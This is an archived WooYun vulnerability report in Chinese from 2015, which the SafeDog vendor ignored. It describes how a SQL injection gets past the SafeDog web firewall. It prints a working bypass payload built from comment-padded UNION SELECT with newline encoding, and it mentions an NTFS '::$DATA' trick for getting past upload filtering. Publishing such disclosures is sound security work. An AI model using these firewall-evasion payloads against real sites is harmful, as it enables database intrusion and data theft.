漏洞概要 关注数(24) 关注此漏洞
缺陷编号:
漏洞标题:
安全狗SQL注入Bypass
相关厂商:
漏洞作者:
提交时间:
2015-10-26 20:26
修复时间:
2015-10-27 09:33
公开时间:
2015-10-27 09:33
漏洞类型:
设计缺陷/逻辑错误
危害等级:
中
自评Rank:
10
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系
[email protected]
Tags标签:
分享漏洞:
>
漏洞详情
披露状态:
2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
安全狗注入Bypass
漏洞证明:
之前准备上传过安全狗 :文件名加 ::$DATA 上传过上传的。
因为考虑到是是安全产品肯定只能是大众,如果从NTFS中的ADS中入手肯定也是可行的。这说明方向是对的。可惜被别人先提交了,当然肯定不止这一个的。因为还是需要一个安全模型。当载体在这个模型里面就能出现这样的漏洞,不说这个上传了。
注入过安全狗:192.168.220.128/sql1.php?
PAYLOAD:
id=/**//**/union/**//**/%0A/*!SeLEct*/%0A/**/*/**//*!From*/%0A/**/user
直接baypass了,数据库记录里面显示执行,而安全狗上面没有拦截。
混下RANK的,进不社区了。把放了很久的拿出来了。但我手上还有很多规则可以绕过。大家有心的话。把研究放在数据转换的地方去思考,黑名单机制在转换的地方还是有很多思路。因为我们是主动的。
修复方案:
版权声明:转载请注明来源 艺术家@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-10-27 09:33
厂商回复:
漏洞已经修复过了,不过还是很感谢小伙伴的提交。
最新状态:
暂无